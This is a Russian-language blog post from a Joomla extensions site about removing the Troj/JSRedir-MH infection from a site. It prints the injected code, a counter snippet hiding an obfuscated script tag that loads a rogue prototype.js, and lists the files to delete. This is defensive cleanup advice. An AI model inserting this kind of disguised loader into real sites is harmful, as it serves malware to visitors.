Troj/JSRedir-MH
Снова грянул гром зарежения сайтов новым вирусом Troj/JSRedir-MH.
И так в коротко по вирусу Troj/JSRedir-MH. Вирус или троян куда интереснее чем свои предшествиники, теперь в заражонных файлах прописывается не куча подозрительных строк, а вписывается аккуратный код такого вида, например у клиента он был вписан в счетчики подсчета посещения сайта и сразу в глаза не бросился, проверки через онланй системы проверки сайтовов от вирусов не к чему не привели, ругался только яндекс.
Вот пример нашего вкрапления подключения вируса:
<!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<a href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' _cke_saved_href='http://www.liveinternet.ru/click' "+ "target=_blank><img src='http://counter.yadro.ru/hit?t54.6;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt='' title='LiveInternet: показано число просмотров и"+ " посетителей за 24 часа' "+ "border='0' width='88' height='31'><\/a>") //--></script><script type="text/javascript"> document.write("<scr"+"ipt src='/administrator/modules/prototype.js' _cke_saved_src='/administrator/modules/prototype.js'><"+"/script>"); </script><!--/LiveInternet--> обратим внимание на эту часть кода <scripttype="text/javascript">
document.write("<scr"+"ipt src='/administrator/modules/prototype.js' _cke_saved_src='/administrator/modules/prototype.js'><"+"/script>"); </script>
Никакого файла prototype.js для работы сайта у нас не было и к системе он не относится, заходим по пути и удаляем его, теперь возвращаемся выше и видим кучу левых созданных файлов с расширением php удаляем их тоже, оставляя только файлы от системы Joomla.
В этом файле есть запуск флеш файла /mambots/search/sections.searchbot.swf , при том что ясно что файл не наш так как флеш не применяем, заходим смотрим
Troj/JSRedir-MH - Генератор расширений Joomla и многое другое на нашем сайте посвященном работе расширений, компонентов, модулей, плагинов для линейки Joomla. Отправляйте ссылку на страницу своим друзьям и в социальные сети воспользовавшись графическими иконками выше.
